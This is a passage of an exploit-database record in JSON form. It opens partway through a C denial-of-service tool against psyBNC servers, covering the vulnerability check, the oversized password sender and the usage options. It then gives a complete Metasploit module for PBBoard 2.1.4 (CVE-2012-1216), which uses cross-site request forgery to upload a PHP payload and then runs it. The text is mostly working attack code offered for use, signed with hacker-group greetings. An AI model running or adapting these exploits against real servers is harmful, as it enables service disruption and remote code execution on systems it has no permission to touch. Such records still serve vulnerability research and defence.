memcpy(dosbuf+5, passbuf, strlen(passbuf));\r\n \r\n memcpy(dosbuf+5+strlen(passbuf), \"\\n\\r\", 2);\r\n \r\n z = write(s, dosbuf, strlen(dosbuf));\r\n if (z == -1) {\r\n printf(\"[!] Failed on write!\\n\");\r\n exit(1);\r\n }\r\n \r\n close(s);\r\n \r\n free(dosbuf);\r\n free(passbuf);\r\n \r\n return 0;\r\n}\r\n\r\nint checkvuln(char *rxbuf)\r\n{\r\n int vuln_t;\r\n char *bnc;\r\n \r\n sprintf(&rxbuf[strlen(rxbuf)-2], 0);\r\n \r\n if (force == 1) {return 0;}\r\n if (checked == 1) { return 0;}\r\n printf(\"[?] Server returned: %s\\n\", rxbuf);\r\n if (bnc = strstr(rxbuf, \"psyBNC2.\")) {\r\n if (strcasecmp(&bnc[9], \".\") > 0) {\r\n vuln_t = 1;\r\n }\r\n if ((int)(bnc[8] - '0') <= 3) { \r\n if ((int)(bnc[8] - '0') == 3 && vuln_t == 1) {\r\n printf(\"[!] Server is NOT VULN!\\n\");\r\n exit(1);\r\n }\r\n printf(\"[*] Server is VULN!!\\n\");\r\n } else {\r\n printf(\"[!] Server is NOT VULN!\\n\");\r\n exit(1);\r\n }\r\n } else { \r\n printf(\"[!] Server is NOT VULN!\\n\");\r\n exit(1);\r\n }\r\n \r\n checked = 1;\r\n \r\n return 0;\r\n}\r\n\r\nint testvuln(int port, char *target)\r\n{\r\n int s, z, len_inet;\r\n unsigned long ipaddr;\r\n char rxbuf[1024];\r\n \r\n struct sockaddr_in victim;\r\n \r\n if (!(ipaddr = resolvenametoip(target))) {\r\n printf(\"[!] Failed to resolve '%s'\\n\", target);\r\n exit(1);\r\n }\r\n \r\n victim.sin_family = AF_INET;\r\n victim.sin_port = htons(port);\r\n victim.sin_addr.s_addr = ipaddr;\r\n \r\n len_inet = sizeof(victim);\r\n \r\n s = socket(PF_INET, SOCK_STREAM, 0);\r\n if (s < 0) {\r\n printf(\"[!] Failed to open socket!\\n\");\r\n exit(1);\r\n }\r\n \r\n z = connect(s, (struct sockaddr *)&victim, len_inet);\r\n if (z < 0) {\r\n printf(\"[!] Connection refused!\\n\");\r\n exit(1);\r\n }\r\n \r\n z = read(s, rxbuf, sizeof(rxbuf));\r\n if (z == -1) {\r\n printf(\"[!] Failed on read!\\n\");\r\n exit(1); \r\n }\r\n \r\n z = checkvuln(rxbuf);\r\n if (z == -1) {\r\n printf(\"[!] Failed on vuln check!\\n\");\r\n exit(1);\r\n }\r\n \r\n return 0;\r\n}\r\n\r\nunsigned long resolvenametoip(char *name)\r\n{\r\n struct hostent *host;\r\n unsigned long addr;\r\n \r\n if ((addr = inet_addr(name)) == -1) {\r\n if (!(host = gethostbyname(name))) return 0;\r\n else addr = *((unsigned long*)host->h_addr);\r\n }\r\n \r\n return addr;\r\n} \r\n\r\nvoid usage(char *prog) \r\n{\r\n printf(\"usage: %s [options]\\n\", prog);\r\n printf(\"\\t-d <target> Server hosting psybnc [REQUIRED]\\n\");\r\n printf(\"\\t-f force Skip vuln checking\\n\");\r\n printf(\"\\t-h help Your looking at it\\n\");\r\n printf(\"\\t-n <number> Number of times to attack Default: 3\\n\");\r\n printf(\"\\t-p <port> Port to connect to Default: 31337\\n\");\r\n printf(\"\\t-s <size> Size of password to send Default: 9000\\n\");\r\n printf(\"\\t-t test Tests for vuln\\n\");\r\n printf(\"\\t-u <user> User to login with Default: pr0ix\\n\\n\");\r\n exit(1);\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/5816", "hash": "89d34ad7632828517c6714c060cb8547905756f79f6047beeaad725d72217f12"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:29", "references": [], "edition": 1, "description": "", "reporter": "KedAns-Dz", "published": "2012-05-29T00:00:00", "type": "packetstorm", "title": "PBBoard 2.1.4 Cross Site Request Forgery", "objectVersion": "1.2", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1216"], "modified": "2012-05-29T00:00:00", "href": "https://packetstormsecurity.com/files/113109/PBBoard-2.1.4-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:113109", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Site : 1337day.com 0 \n1 [+] Support e-mail : submit[at]1337day.com 1 \n0 0 \n1 ######################################### 1 \n0 I'm KedAns-Dz member from Inj3ct0r Team 1 \n1 ######################################### 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n### \n# Title : PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution (MSF) \n# Author : KedAns-Dz \n# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) \n# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) \n# Web Site : www.1337day.com | www.inj3ct0rs.com \n# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d \n# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com \n# platform : php \n# Type : Metasploit -Remote Exploit- \n# Security Risk : Critical \n# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 \n### \n \n## \n# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | \n# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | \n# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | \n# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | \n# | ------------------------------------------------- < | \n## \n \n# <3 <3 Greetings t0 Palestine <3 <3 \n \n# Download : [http://github.com/downloads/PhpMax/PBBoard/PBBoard_v2_1_4.zip] \n \n######## (!) References => \n# _______________ \n# | CVE-2012-1216 | \n# | OSVDB-79218 | \n# | 1337ID-17520 | \n# | PS-SEC-109706 | \n# | CWE-352 | \n# --------------- \n# \n######## (!) Exploit ====> \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution\", \n'Description' => %q{ \nThis module exploits a Multiple cross-site request forgery (CSRF) vulnerabilities \nin admin.php in PBBoard 2.1.4 allow remote attackers to hijack the authentication \nof administrators for requests that upload a file via an add action. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'KedAns-Dz <ked-h[at]1337day.com>', # Discovery PoC ,and Metasploit module \n], \n'References' => \n[ \n['CVE', '2012-1216'], \n['OSVDB', '79218'], \n['URL', 'http://1337day.com/exploits/17520'], # 1337ID-17520 \n['URL', 'http://secunia.com/advisories/47948/'], # SA47948 \n['URL', 'http://packetstormsecurity.org/files/109706/PBBoard-2.1.4-Cross-Site-Request-Forgery-Shell-Upload.html'] # PS-SEC-109706 \n# CWE-352 \n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1216 \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['PBBoard v2.1.4', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Fev 12 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to dorncms', '/PBBoard v2.1.4']) \n], self.class) \nend \n \ndef check \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}admin.php\" \n}) \n \nif res and res.code == 200 and res.body.empty? \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(5) + 5) + '.php' \n \npost_data = \"--1337day\\r\\n\" \npost_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\" \npost_data << \"Content-Type : text/html;\\r\\n\" \npost_data << \"<?php \" \npost_data << payload.encoded \npost_data << \" ?>\\r\\n\" \npost_data << \"--1337day\\r\\n\" \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}admin.php?page=pages&add=1&start=1\", \n'ctype' => 'multipart/form-data; boundary=1337day', \n'data' => post_data \n}) \n \nif not res or res.code != 200 or res.body !~ /#{payload_name}/ \nprint_error(\"#{peer} - I don't think the file was uploaded !\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}#{payload_name}\" \n}) \n \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returns #{res.code.to_s}\") \nend \nend \n \n############# << ThE|End \n \n#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== \n# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w \n# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) \n# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection \n# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore \n# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke \n# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE \n# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs .. \n#===========================================================================================================`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113109/pbboard-mcsrf-fu-cexe.rb.txt", "hash": "3425b4e9ab15dbaa84821f0e560d2739c0eda8d11a7f620f635ef32b4f670e8b"}]}}